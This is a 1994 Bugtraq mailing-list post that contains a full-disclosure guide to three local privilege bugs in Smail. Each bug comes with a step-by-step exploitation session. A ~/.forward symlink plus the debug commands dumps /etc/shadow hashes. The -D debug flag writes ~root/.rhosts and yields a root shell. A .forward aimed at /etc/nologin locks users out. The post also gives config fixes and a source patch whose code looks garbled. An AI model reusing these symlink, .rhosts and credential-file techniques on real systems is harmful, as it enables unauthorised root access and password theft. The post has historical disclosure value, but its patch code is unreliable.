Bugtraq mailing list archives
Re: 3 SMAIL BUGS
From: xcelsior () altair csustan edu (Excelsior)
Date: Sun, 9 Oct 94 00:09:02 PDT
aleph1 () dfw net (Aleph One) spewed....
Ok for all of you asking which are the 3 here is the count down: Number 3 - The SMTP DEBUG problem. Anyone can telnet to your SMTP port and read any file on the system.
You are exaggerating the problem. To exploit this, you have to have an account on the local machine (in order to create the ~/.forward link). Not just "anyone" can exploit it.
Fixed by adding -smtp_debug in your smail config file.
Wrong wrong wrong! All the -smtp_debug flag does is keep you from exploiting it by telnetting directly to the smtp port. There is an easier way to exploit it.
Number 2 - The .forward problem. Another configuration problem. Smail does not check file atributes when delivering mail
^^^^^^^^^^^^^^ Wrong again. It does checks the file attributes, but not the attributes of the DIRECTORY you are trying to create the file in - thus causing the problem.
to a file pointed to by a .forward. Fixed by adding the check_path attribute to the forward file director. and Number 1 - Debug file bug. Smail create or append to anyfile using the debug options!
How about explaining those bugs in detail? If I wanted to hear "There is a bug" with no explaination, I'd read CERT. Maybe you don't know how the bugs work, but if you do, don't be a WUSS - post it!
There. What I said will fix #1 and #2.
Nope, what you said will definitely NOT fix #1 or #3. You can fix #2 as you described, but you weren't very specific about it, were you?
Several different patches have been posted for #3 on usenet. Check comp.mail.smail and the comp.is.linux.* newsgroups. Also the maintainers of smail will fixed RSN.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Isn't that a little harsh? How about just giving them a course in writing secure Setuid programs. :) Ok, now everyone repeat after me: BUGTRAQ IS A FULL DISCLOSURE LIST That's right. FULL disclosure. Since all the elite cracker pussies are too scared to describe their bugs in detail, I will. I am including a security doc on smail that I wrote a little while ago. I'm sure most of the cracker dudes got it from my DocServer and FTP site, so here it comes to the rest of you. I hope this encourages more people to stop being childish and post your bugs. I'll be posting more goodies from my archives soon as well. Share and enjoy.... :) ------------------------------------------------- EXCELSIOR'S GUIDE TO SMAIL BUGS - Sept 1994 *** Bug #1 *** SYNOPSIS -------- Use of ~/.forward and debug lets a local user read any file on the system. EXAMPLE OF EXPLOITATION ----------------------- loser@possesux ~> ln -s /etc/shadow .forward loser@possesux ~> ls -la .forward lrwxrwxrwx 1 loser users 11 Sep 5 12:08 .forward -> /etc/shadow loser@possesux ~> telnet localhost smtp Trying 127.0.0.1... Connected to localhost-gw. Escape character is '^]'. 220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10 PDT debug 20 250 Debugging level: 20 expn loser [lots of crap] expand_string(~/.forward, /home/loser, loser) called expand_string returns /home/loser/.forward dtd_forwardfile: opening forward file /home/loser/.forward [more crap] read 890 bytes director dotforward: matched loser, forwarded to root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7::: bin:*:8000:0:99999:7::: daemon:*:8000:0:99999:7::: nobody:*:8000:0:99999:7::: loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7::: [....] process_field: entry We have a group We have a group process_field: error: recursive address group 550 loser ... not matched quit 221 possesux.warez.mil closing connection Connection closed by foreign host. --------------- Contrary to popular belief, adding -smtp_debup to your smail config file will NOT prevent this bug from occuring. It will just prevent exploitation via the smtp port. We can just do this.... ---------- loser@possesux ~> smail -bs -v20 expand_string($primary_name Smail$version ready for fakemail on $date,(null), (null)) called expand_string returns possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT 220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT expn loser [same crap as before] expand_string(~/.forward, /home/loser, loser) called expand_string returns /home/loser/.forward dtd_forwardfile: opening forward file /home/loser/.forward [more of same crap] read 890 bytes director dotforward: matched loser, forwarded to root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7::: bin:*:8000:0:99999:7::: daemon:*:8000:0:99999:7::: nobody:*:8000:0:99999:7::: loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7::: [.....] process_field: entry We have a group We have a group process_field: error: recursive address group 550 loser ... not matched quit 221 possesux.warez.mil closing connection ---------- The easy way to fix this is to nuke the -d and -v options from smail. *** Bug #2 *** SYNOPSIS -------- Smail called with the -D flag will allow you to create and append to any file on the system. EXAMPLE OF EXPLOITATION ----------------------- loser@possesux ~> cat ~/.forward localhost loser ^D loser@possesux ~> smail -bs -D ~root/.rhosts -v20 220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23 PDT expn loser 250 loser quit 221 possesux.warez.mil closing connection loser@possesux ~> rsh -l root localhost tcsh\ -i Warning: no access to tty (Bad file number). Thus no job control in this shell. # id uid=0(root) gid=0(root) -------------- Neat, huh? Patch by nuking the -D option from smail. I received the following patch recently. I haven't tested it, so use at your own risk. *** Omain.c Wed Mar 11 12:33:18 1993 --- main.c Wed Mar 11 12:59:54 1993 *************** *** 436,458 **** } - /* - * change error file to debugging file from -D option, if any - */ - - if (arg_debug_file) { - new_errfile = fopen(arg_debug_file, "a"); - if (new_errfile == NULL) { - write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n", - arg_debug_file, strerrno(errno)); - arg_debug_file = NULL; - } else { - errfile = new_errfile; - fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n", - program, (long)getpid()); - } - } - - /* * read in the transport, router and director files, if needed * * NOTE: if queue_only is FALSE and mode is DELIVER_MAIL, --- 436,441 ---- *************** *** 525,530 **** --- 508,537 ---- if (prog_euid != REQUIRED_EUID) queue_only = TRUE; #endif + + /* + * change error file to debugging file from -D option, if any + * + * JMJ: Change location of this fragment to below the setuid/setgid + * calls to allow for use of fopen_as_user() instead of just + * fopen(). + * + * Side effect: -D now requires full pathname to debug file + */ + + if (arg_debug_file) { + new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid, + prog_egid, 0600); + write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n", + arg_debug_file, strerrno(errno)); + arg_debug_file = NULL; + } else { + errfile = new_errfile; + fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n", + program, (long)getpid()); + } + } /* * error processing can be other than TERMINAL only for -- *** Bug #3 *** SYNOPSIS -------- Files specified in ~/.forward can be created in any directory, regardless of it's permissions. (File is still owned by mailbox owner, however.) EXAMPLE OF EXPLOITATION ----------------------- loser@possesux ~> echo "/etc/nologin" > ~/.forward loser@possesux ~> mail -r root loser < /dev/null loser@possesux ~> echo "Site shutdown due to smail lameness" >! /etc/nologin loser@possesux ~> rlogin localhost Site shutdown due to smail lameness rlogin: connection closed. --------- Plug up this hole by adding 'check_path' to the following part of your /usr/lib/smail/transports file: --- [...] # file - deliver mail to files # # This is used implicitly when smail encounters addresses which begin with # a slash or squiggle character, such as "/usr/info/list_messages" or # perhaps "~/Mail/inbox". file: driver = appendfile, return_path, local, from, unix_from_hack; file = $user, # file is taken from address append_as_user, # use user-id associated with address expand_user, # expand ~ and $ within address check_path, #<--add this line suffix = "\n", mode = 0644 [...] --- That's it for now. If you appreciated reading this file, then consider posting your explotation scripts too. Share and enjoy! - Excelsior
Current thread:
- Re: 3 SMAIL BUGS Excelsior (Oct 09)